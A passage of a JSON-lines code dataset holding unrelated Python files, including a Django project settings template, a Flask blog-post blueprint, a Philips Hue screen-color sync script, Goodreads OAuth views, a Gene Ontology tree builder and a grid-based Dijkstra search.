numpy.repeat(numpy.sqrt(masses), 3)\np = numpy.eye(*hessian.shape) - numpy.dot(e_tr, e_tr.T)\np = numpy.linalg.multi_dot([numpy.diag(m), p, numpy.diag(1./m)])\n\nhess = numpy.linalg.multi_dot([p, hessian, p.T])\n# hess = numpy.linalg.multi_dot([p, hess, p.T])\n# hess = numpy.linalg.multi_dot([p, hess, p.T])\n\nprint(hess.round(3))\n# assert_almost_equal(hess, hessian_ref, decimal=10)\nprint((hess - hessian_ref).round(6))\n","sub_path":"nuctools/examples/iohelp/molpro/hessian.py","file_name":"hessian.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"175576279","text":"\"\"\"\nTest postgres module.\n\n\"\"\"\nfrom hamcrest import assert_that, has_entries\n\nfrom docker_etude import Composition, Source\n\n\ndef test_postgres_module():\n source = Source.load_source()\n module = source.load_module(\"postgres\")\n composition = Composition.build(module)\n\n assert_that(\n composition.to_dict(),\n has_entries(\n version=\"3\",\n networks=None,\n services={\n \"postgres\": dict(\n container_name=\"postgres\",\n image=\"postgres\",\n ports=[\n \"5432:5432\",\n ],\n volumes=[\n \"postgres-data:/var/lib/postgresql/data\",\n ],\n ),\n },\n volumes={\n \"postgres-data\": None,\n },\n ),\n )\n","sub_path":"docker_etude/tests/modules/test_postgres.py","file_name":"test_postgres.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"321133149","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: d:\\shared\\tim_working\\development\\github\\pylirious\\pylirious\\mm-api\\python\\mm\\selection.py\n# Compiled at: 2016-07-24 13:10:59\nimport mmapi\nfrom convert import *\nfrom tool import *\n\ndef 
clear_face_selection(remote):\n \"\"\"Clear the current face selection (if there is one) and exit the Selection Tool\"\"\"\n cancel_tool(remote)\n\n\ndef select_all(remote):\n \"\"\"Select all faces of the active object (will initialize a Selection Tool if necessary)\"\"\"\n cmd = mmapi.StoredCommands()\n cmd.AppendCompleteToolCommand('cancel')\n cmd.AppendBeginToolCommand('select')\n cmd.AppendSelectCommand_All()\n remote.runCommand(cmd)\n\n\ndef selection_utility_command(remote, command_name):\n \"\"\"Run a selection utility command (see ::AppendSelectUtilityCommand in StoredCommands.h)\"\"\"\n cmd = mmapi.StoredCommands()\n cmd.AppendSelectUtilityCommand(command_name)\n remote.runCommand(cmd)\n\n\ndef select_facegroups(remote, groups_list):\n \"\"\"Select the faces which have a facegroup ID in groups_list\"\"\"\n cmd = mmapi.StoredCommands()\n vgroups = mmapi.vectori()\n for group in groups_list:\n vgroups.push_back(group)\n\n cmd2 = mmapi.StoredCommands()\n cmd2.AppendSelectCommand_ByFaceGroups(vgroups)\n remote.runCommand(cmd2)\n\n\ndef select_inside_sphere(remote, sphere_center, sphere_radius):\n \"\"\"Select the faces inside the sphere with given center/radius. Requires active Selection Tool.\"\"\"\n cmd = mmapi.StoredCommands()\n cmd.AppendSelectCommand_InsideSphere(sphere_center[0], sphere_center[1], sphere_center[2], sphere_radius)\n remote.runCommand(cmd)","sub_path":"pycfiles/pyliseberg-1.0-py2-none-any/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"253601479","text":"import pandas as pd\nfrom goatools import obo_parser\n\ngo_tree = open('data/go_tree.tsv', 'w')\ngo_tree.write('parent\\tchild\\ttype\\ttree\\n')\n\nobo = obo_parser.GODag('data/go-basic.obo')\n\nfor term in list(obo.keys()):\n\tif not obo[term].is_obsolete:\n\t\tfor parent in obo[term].parents:\n\t\t\tif not parent.is_obsolete:\n\t\t\t\tgo_tree.write('%s\\t%s\\tterm\\tTREE\\n' % (parent.id, term))\n\n# go_tree.close()\n\n# del obo\n\ngene_map = {}\nwith open('data/gene_map.tsv','r') as lines:\n\tfor line in lines:\n\t\tkey, value = line.split('\\t')\n\t\tgene_map[key] = value.rstrip()\n\n\nassociation_head = ['DB','DB_Object_ID','DB_Object_Symbol','Qualifier','GO_ID','DB_Ref','evidence','with','aspec','DB_Object_Name','DB_Object_Synonym','DB_Object_Type','taxon','Date','assigned_by','extension','gene_product_id']\ngene_association = pd.read_csv('data/gene_association.sgd', names=association_head, sep='\\t', skiprows=18)\n# once manipulated, can trim down only to entries that have our genes from Costanzo\n\ngene_association = gene_association.loc[gene_association['DB_Object_Symbol'].isin(gene_map.keys())]\ngene_association['gene'] = gene_association.apply(lambda row: gene_map[row.DB_Object_Symbol], axis=1)\n\ngene_to_go = gene_association.loc[:,['GO_ID','gene']]\n\ndel gene_association\n\nobo_keys = obo.keys()\nfor index, row in gene_to_go.iterrows():\n\tif row['GO_ID'] in obo_keys and not obo[row['GO_ID']].is_obsolete:\n\t\tgo_tree.write('%s\\t%s\\tgene\\tTREE\\n' % (row['GO_ID'], row['gene']))\n\nfor term in ['GO:0008150','GO:0005575','GO:0098772']:\n\tgo_tree.write('%s\\t%s\\tterm\\tTREE\\n' % ('GO:00SUPER', term))\n\n\n\ngo_tree.close()\n\n","sub_path":"data-builder/gwa_prepare_ontology_file.py","file_name":"gwa_prepare_ontology_file.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 
+{"seq_id":"136329434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for {{cookiecutter.project_name}} project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nfrom os.path import join\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n########## DEBUG CONFIGURATION\nif os.environ.get(\"DATABASE_URL\", None):\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\n DEBUG = False\nelse:\n DEBUG = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\nTEMPLATE_DEBUG = DEBUG\n########## END DEBUG CONFIGURATION\n\n\n########## SECRET CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = \"ASDFhasdlfjasdfasdghpoawrngasdf\"\n########## END SECRET CONFIGURATION\n\n\n########## FIXTURE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\nFIXTURE_DIRS = (\n join(BASE_DIR, 'fixtures'),\n)\n########## END FIXTURE CONFIGURATION\n\n\n########## MANAGER CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\nADMINS = (\n ('{{cookiecutter.author_name}}', '{{cookiecutter.email}}'),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\nMANAGERS = ADMINS\n########## END MANAGER CONFIGURATION\n\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nimport dj_database_url\nDATABASES = {'default': dj_database_url.config()}\nif DATABASES == {'default': {}}:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': \"{{cookiecutter.repo_name}}\",\n }\n }\n########## END DATABASE CONFIGURATION\n\n\n########## GENERAL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\nTIME_ZONE = 'America/Los_Angeles'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'en-us'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n########## END GENERAL CONFIGURATION\n\n\n########## MEDIA CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\nMEDIA_ROOT = join(BASE_DIR, 'media')\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\nMEDIA_URL = '/media/'\n########## END MEDIA CONFIGURATION\n\n########## MIDDLEWARE CONFIGURATION\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n########## END MIDDLEWARE CONFIGURATION\n\n\n########## STATIC FILE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\nSTATIC_ROOT = 'staticfiles'\n\n# See: 
https://docs.djangoproject.com/en/dev/ref/settings/#static-url\nSTATIC_URL = '/static/'\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = (\n join(BASE_DIR, 'static'),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n########## END STATIC FILE CONFIGURATION\n\n\n########## APP CONFIGURATION\nDJANGO_APPS = (\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n # Useful template tags:\n # 'django.contrib.humanize',\n\n # Admin\n 'django.contrib.admin',\n)\nTHIRD_PARTY_APPS = (\n 'south', # Database migration helpers:\n 'crispy_forms', # Form layouts\n 'avatar', # for user avatars\n)\n\n# Apps specific for this project go here.\nLOCAL_APPS = (\n 'users', # custom users app\n # Your stuff: custom apps go here\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\nINSTALLED_APPS += (\n # Needs to come last for now because of a weird edge case between\n # South and allauth\n 'allauth', # registration\n 'allauth.account', # registration\n 'allauth.socialaccount', # registration\n)\n########## END APP CONFIGURATION\n\n\n########## URL Configuration\nROOT_URLCONF = 'config.urls'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\nWSGI_APPLICATION = 'config.wsgi.application'\n########## End URL Configuration\n\n########## django-secure\nSECURE = False\nif SECURE:\n INSTALLED_APPS += (\"djangosecure\", )\n\n # set this to 60 seconds and then to 518400 when you can prove it works\n SECURE_HSTS_SECONDS = 60\n SECURE_HSTS_INCLUDE_SUBDOMAINS = True\n SECURE_FRAME_DENY = True\n SECURE_CONTENT_TYPE_NOSNIFF = True\n SECURE_BROWSER_XSS_FILTER = True\n SESSION_COOKIE_SECURE = True\n SESSION_COOKIE_HTTPONLY = True\n SECURE_SSL_REDIRECT = True\n########## end django-secure\n\n\n########## AUTHENTICATION CONFIGURATION\nAUTHENTICATION_BACKENDS = (\n \"django.contrib.auth.backends.ModelBackend\",\n \"allauth.account.auth_backends.AuthenticationBackend\",\n)\n\n# Some really nice defaults\nACCOUNT_AUTHENTICATION_METHOD = \"username\"\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = \"mandatory\"\n########## END AUTHENTICATION CONFIGURATION\n\n\n########## Custom user app defaults\n# Select the correct user model\nAUTH_USER_MODEL = \"users.User\"\nLOGIN_REDIRECT_URL = \"users:redirect\"\n########## END Custom user app defaults\n\n\n########## SLUGLIFIER\nAUTOSLUG_SLUGIFY_FUNCTION = \"slugify.slugify\"\n########## END SLUGLIFIER\n\n\n################## PRODUCTION SETTINGS\nif DEBUG:\n EMAIL_HOST = \"localhost\"\n EMAIL_PORT = 1025\n MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)\n INSTALLED_APPS += ('debug_toolbar',)\n\n INTERNAL_IPS = ('127.0.0.1',)\n\n DEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n 'SHOW_TEMPLATE_CONTEXT': True,\n }\nelse:\n\n TEMPLATE_DEBUG = DEBUG\n\n ########## SITE CONFIGURATION\n # Hosts/domain names that are valid for this site\n # See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\n ALLOWED_HOSTS = [\"*\"]\n ########## END SITE CONFIGURATION\n\n INSTALLED_APPS += (\"gunicorn\", )\n\n ########## 
STORAGE CONFIGURATION\n from S3 import CallingFormat\n from os import environ\n # See: http://django-storages.readthedocs.org/en/latest/index.html\n INSTALLED_APPS += (\n 'storages',\n )\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n AWS_ACCESS_KEY_ID = environ.get('AWS_ACCESS_KEY_ID', '')\n AWS_SECRET_ACCESS_KEY = environ.get('AWS_SECRET_ACCESS_KEY', '')\n AWS_STORAGE_BUCKET_NAME = environ.get('AWS_STORAGE_BUCKET_NAME', '')\n AWS_AUTO_CREATE_BUCKET = True\n AWS_QUERYSTRING_AUTH = False\n\n # AWS cache settings, don't change unless you know what you're doing:\n AWS_EXPIREY = 60 * 60 * 24 * 7\n AWS_HEADERS = {\n 'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,\n AWS_EXPIREY)\n }\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME\n ########## END STORAGE CONFIGURATION\n\n ########## EMAIL\n DEFAULT_FROM_EMAIL = environ.get('DEFAULT_FROM_EMAIL',\n '{{cookiecutter.project_name}} <{{cookiecutter.project_name}}-noreply@{{cookiecutter.domain_name}}>')\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.sendgrid.com')\n EMAIL_HOST_PASSWORD = os.environ.get('SENDGRID_PASSWORD', '')\n EMAIL_HOST_USER = os.environ.get('SENDGRID_USERNAME', '')\n EMAIL_PORT = environ.get('EMAIL_PORT', 587)\n EMAIL_SUBJECT_PREFIX = environ.get('EMAIL_SUBJECT_PREFIX', '[{{cookiecutter.project_name}}] ')\n EMAIL_USE_TLS = True\n SERVER_EMAIL = EMAIL_HOST_USER\n ########## END EMAIL\n\n########## TEMPLATE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n \"allauth.account.context_processors.account\",\n \"allauth.socialaccount.context_processors.socialaccount\",\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n # Your stuff: custom template context processors go here\n)\n\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\nTEMPLATE_DIRS = (\n join(BASE_DIR, 'templates'),\n)\n\nif DEBUG:\n TEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n )\nelse:\n TEMPLATE_LOADERS = (\n ('django.template.loaders.cached.Loader', (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n )),\n )\n########## END TEMPLATE CONFIGURATION\n\n\n########## LOGGING CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n########## END LOGGING CONFIGURATION\n\n########## CACHING\nfrom memcacheify import memcacheify\nCACHES = memcacheify()\n########## END CACHING\n\n\n########## Your stuff: Below this line define 3rd party library settings\n\n","sub_path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"442740037","text":"import mss\nimport mss.tools\nfrom PIL import Image\nfrom phue import Bridge\nimport random\nimport time\n\ndef avg(image):\n color_tuple = [None, None, None]\n for channel in range(3):\n pixels = image.getdata(band=channel)\n values = []\n for pixel in pixels:\n values.append(pixel)\n color_tuple[channel] = sum (values)/len(values)\n return tuple(color_tuple)\n\ndef rgb_to_cie(rgb_tuple):\n red = rgb_tuple[0]\n green = rgb_tuple[1]\n blue = rgb_tuple[2]\n\n #Use the formula described in https://gist.github.com/popcorn245/30afa0f98eea1c2fd34d to get xy values.\n r = ((red + 0.055) / (1.055)) ** 2.4 if (red > 0.04045) else (red / 12.92)\n g = ((green + 0.055) / (1.055)) ** 2.4 if (green > 0.04045) else (green / 12.92)\n b = ((blue + 0.055) / (1.055)) ** 2.4 if (blue > 0.04045) else (blue / 12.92)\n\n X = r * 0.664511 + g * 0.154324 + b * 0.162028\n Y = r * 0.283881 + g * 0.668433 + b * 0.047685\n Z = r * 0.000088 + g * 0.072310 + b * 0.986039\n\n if((X + Y + Z) == 0):\n return (0, 0)\n\n cx = X / (X + Y + Z)\n cy = Y / (X + Y + Z)\n\n return (cx, cy)\n\ndef change_lights(mon, bulb, lights, monitor):\n # Capture a bbox using percent values\n left = monitor['left'] + monitor['width'] * mon // 100 # 0% from the left\n top = monitor['top'] + monitor['height'] * mon // 100 # 0% from the top\n right = left + 400 # 400px width\n lower = top + 400 # 400px height\n\n bbox = (left, top, right, lower)\n\n # Grab the picture\n # Using PIL would be something like:\n # im = ImageGrab(bbox=bbox)\n sct_img = sct.grab(bbox)\n\n '''# save as pngs\n output = 'output' + str(mon) + '.png'.format(**monitor)\n mss.tools.to_png(sct_img.rgb, sct_img.size, output=output)'''\n\n # Create an Image\n img = Image.new('RGB', sct_img.size)\n\n # Best solution: create a list(tuple(R, G, B), ...) 
for putdata()\n pixels = zip(sct_img.raw[2::4],\n sct_img.raw[1::4],\n sct_img.raw[0::4])\n img.putdata(list(pixels))\n\n rgb_tuple = avg(img)\n\n luma = 0.2126 * rgb_tuple[0] + 0.7152 * rgb_tuple[1] + 0.0722 * rgb_tuple[2]\n if luma > 100:\n luma = 100\n\n cx, cy = rgb_to_cie(rgb_tuple)\n\n lights[bulb].xy = [cx, cy]\n\n lights[bulb].brightness = int(luma * 2.54)\n\n print('set light to ', cx, ' ', cy)\n print('luminance: ', luma * 2.54)\n print()\n\nwhile True:\n\ttry:\n\t\tip = input(\"Enter the IP for the Bridge you would like to connect to: \")\n\t\tb = Bridge(ip)\n\t\tb.connect()\n\t\tbreak\n\texcept:\n\t\tprint(\"Could not connect to the Bridge, try again.\")\n\nlights = b.get_light_objects()\nprint(\"Hue lights found: \", len(lights))\n\nlight_sections = [0] * len(b.get_light_objects())\n\nfor i in range(len(lights)):\n\twhile True:\n\t\ttry:\n\t\t\tstring = input(\"Enter the percentage of the screen you would like light \" + str(i) + \" to represent: \")\n\t\t\tlight_sections[i] = int(string)\n\t\t\tbreak\n\t\texcept:\n\t\t\tprint(\"invalid input for light \" + str(i) + \"!\")\n\nwith mss.mss() as sct:\n while True:\n try:\n print(\"Monitor IDs:\")\n for i in range(len(sct.monitors)):\n print(\"\\tid: \", i)\n print(\"Monitor Details:\", sct.monitors)\n string = input(\"Enter the monitor you would like to use: \")\n monitor = sct.monitors[int(string)]\n break\n except:\n print(\"invalid input for the monitor!\")\n\n while True:\n for i in range(len(lights)):\n print(\"light\", i)\n change_lights(light_sections[i], i, lights, monitor)\n","sub_path":"light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"37091946","text":"import json\nimport os\nimport random\nimport string\nfrom datetime import datetime, timedelta\n\nfrom flask import (Blueprint, Response, abort, flash, redirect,\n render_template, request, send_from_directory, session,\n url_for)\nfrom PIL import Image\n\nfrom models.user_model import User\nfrom models.post_model import Post\nfrom utilities.login import *\n\nfrom models.database import *\n\npost_blueprint = Blueprint('post_blueprint', __name__)\n\n@post_blueprint.before_request\ndef before_request():\n db.session.expire_all()\n\n@post_blueprint.route('/', methods=['POST'])\ndef index():\n try:\n if check_session():\n return render_template('posts.html', posts=[json.loads(repr(post)) for post in Post.all()])\n else:\n return redirect('/')\n except Exception as error:\n return message(503, repr(error))\n\n\n@post_blueprint.route('/add', methods=['POST', 'GET'])\ndef add():\n if not check_session():\n return redirect('/')\n \n if request.method == 'POST':\n try:\n user = User.get(name=session['name'], email=session['email']).limit(1).all()[0]\n post = Post(author=user.id, title=request.form['title'], body=request.form['body'], picture=request.form['picture'], views=0)\n post.save()\n return message(200, post.id)\n \n except Exception as error:\n return message(503, repr(error))\n elif request.method == 'GET':\n try:\n \n return render_template('add_post.html', user={'name': session['name']})\n except Exception as error:\n return message(503, repr(error))\n\n@post_blueprint.route('/edit/<id>', methods=['GET', 'POST'])\ndef get(id):\n if not check_session():\n return redirect('/admin/')\n \n if request.method == 'GET':\n try:\n post = Post.get(id=id)\n \n if not post:\n return redirect('/admin/#posts')\n\n user = 
User.get(id=post.author).limit(1).all()[0]\n\n return render_template('post.html', post=json.loads(repr(post)), user=json.loads(repr(user)))\n except Exception as error:\n return message(503, repr(error))\n elif request.method =='POST':\n try:\n post = Post.get(id=id)\n\n if post:\n post.update(title=request.form['title'], timestamp=datetime.now(), body=request.form['body'])\n return message(200, 'OK')\n\n return message(503, 'Unknown error!')\n except Exception as error:\n return message(503, repr(error))\n\n@post_blueprint.route('/remove', methods=['POST'])\ndef remove():\n if not check_session():\n return redirect('/admin/')\n\n try:\n post = Post.get(id=request.form['id'])\n post.remove()\n return message(200, 'OK')\n except Exception as error:\n return message(503, repr(error))\n ","sub_path":"cgi-bin/admin/blueprints/post_blueprint.py","file_name":"post_blueprint.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"142001997","text":"import numpy as np\nclass Agent:\n\n def __init__(self,name,agent_local,agent_map,p,q,search_radius,max_speed,communication_radius):\n self.name = name\n self.agent_local = agent_local\n self.agent_map = agent_map\n self.p = p\n self.q = q\n self.search_radius = search_radius\n self.max_speed = max_speed\n self.communication_radius = communication_radius\n\n\n def SingleUp(self,cell_row,cell_column,surveillance_mat,bound): # single-map update\n agent_cell = []\n value_array = np.array(self.agent_local)\n for i in range(cell_row):\n for j in range(cell_column):\n cell_coord = np.array([i, j])\n dist1 = np.linalg.norm(value_array - cell_coord)\n if dist1 <= self.search_radius: # 4 is the search range\n agent_cell.append(cell_coord)\n for one in agent_cell:\n point = surveillance_mat[one[0]][one[1]]\n if point == 1:\n Q = self.agent_map[one[0]][one[1]] + np.log(float(self.q)/float(self.p))\n final_Q = max(min(Q,bound), -bound)\n self.agent_map[one[0]][one[1]] = final_Q\n\n else:\n Q = self.agent_map[one[0]][one[1]] + np.log(float(1-self.q)/float(1- self.p))\n final_Q = max(min(Q, bound), -bound)\n self.agent_map[one[0]][one[1]] = final_Q\n print(self.agent_map)\n\n def Neighbor(self,agent_list,allagent_list): # neighbors\n list_neighbor = []\n for key in agent_list:\n if np.linalg.norm(self.agent_local - np.array(agent_list[key])) <= self.communication_radius:\n list_neighbor.append(key)\n list_neighbor01 = []\n for one in allagent_list:\n if one in agent_list:\n list_neighbor01.append(1)\n else:\n list_neighbor01.append(0)\n return list_neighbor01\n\n\n def Fusion(self,list_neighbor01,N,map_array,allagent_list): # fusion\n d = sum(list_neighbor01)\n list_w = [float(1/N), float(1/N),float(1/N),float(1/N),float(1/N),float(1/N)]\n\n k = allagent_list.index(self.name)\n list_w[k] = 1-(float(d -1)/N)\n w = np.array(list_w)\n mat_w = w * np.array(list_neighbor01)\n i = 0\n fusion_map = np.zeros([25,25])\n for one in mat_w:\n fusion_map += one * map_array[i]\n i += 1\n self.agent_map = fusion_map\n\n\n def Voronoi(self):\n self.agent_local\n voronoi_cell = [[], [], []]\n return voronoi_cell\n\n\n def Move(self, voronoi_cell,area): # move\n mass = 0\n centroid_mole = 0\n for i in voronoi_cell:\n point = self.agent_map[i[0]][i[1]]\n density = np.exp(-2 * np.linalg.norm(point))\n mass += density * area\n centroid_mole += np.array(i) * density *area\n centroid = centroid_mole / float(mass)\n speed = centroid - self.agent_local\n\n if np.linalg.norm(speed) <= 3:\n new_speed = speed\n else:\n new_speed = (3 
/float(np.linalg.norm(speed))) * speed\n self.agent_local += new_speed\n\n\n\n","sub_path":"classAgent.py","file_name":"classAgent.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"252704377","text":"\"\"\"\nDefinition of views.\n\"\"\"\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.template import RequestContext\nfrom datetime import datetime\nfrom rauth.service import OAuth1Service\nfrom app.stats.stats import stats\n\ns=stats()\nservice = OAuth1Service(\n consumer_key=s.gc.client_key,\n consumer_secret=s.gc.client_secret,\n name='goodreads',\n request_token_url='http://www.goodreads.com/oauth/request_token',\n authorize_url='http://www.goodreads.com/oauth/authorize',\n access_token_url='http://www.goodreads.com/oauth/access_token',\n base_url='http://www.goodreads.com/'\n )\nrequest_token, request_token_secret = service.get_request_token(header_auth=True)\ndef home(request):\n \"\"\"Renders the home page.\"\"\"\n \n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Home Page',\n 'year':datetime.now().year,\n }\n )\n\ndef loginGoodreads(request):\n redirect_uri=request.build_absolute_uri('/loginGoodreadsAuth/')\n params = {\n 'scope': 'read_write',\n 'response_type': 'code',\n 'oauth_callback': redirect_uri\n }\n \n \n \n auth_url = service.get_authorize_url(request_token,**params)\n return redirect(auth_url)\n \ndef loginGoodreadsAuth(request):\n \n session=service.get_auth_session(request_token,request_token_secret)\n s.gc.authenticate(session.access_token,session.access_token_secret)\n s.currentUser=s.gc.user()\n s.authenticationFinal(s.gc)\n s.populate()\n context=s.crunch()\n return render(request,'app/stats.html',context)\n \n\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title':'About',\n 'message':'Your application description page.',\n 'year':datetime.now().year,\n }\n )\n","sub_path":"TheUnseenLibrary/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"99345828","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\ndef create_graph(): \n graph = {}\n for i in range(34):\n for j in range(34):\n graph[(i,j)] = {'visited':False, 'distance':np.inf, 'valid':True, 'parent': (0, 0)}\n if i in range(6,13) and j in range(4,11):\n if j >= 14-i:\n graph[(i,j)]['valid'] = False\n if i in range(14,18) and j in range(11,16):\n graph[(i,j)]['valid'] = False\n if i in range(9,13) and j in range(16,21):\n graph[(i,j)]['valid'] = False\n if i in range(18,25) and j in range(16,20):\n graph[(i,j)]['valid'] = False\n if i in range(20, 29) and j in range(6,20):\n if j <= 13*i/8 - 212/8:\n graph[(i,j)]['valid'] = False\n if (i in range(12,29) and j in range(25,29)) or (i in range(25,29) and j in range(22,26)):\n graph[(i,j)]['valid'] = False\n return graph\n\ndef dijkstra(graph, source):\n graph[source]['visited'] = True\n num_nodes_visited = 1\n graph[source]['distance'] = 0\n queue = [source]\n while (len(queue) != 0):\n current = queue.pop(0)\n for i in range(2):\n if current[0]+i <= 32:\n for j in range(2):\n if (current[1]+j) <= 32:\n if i != 0 or j != 0:\n neighbour = 
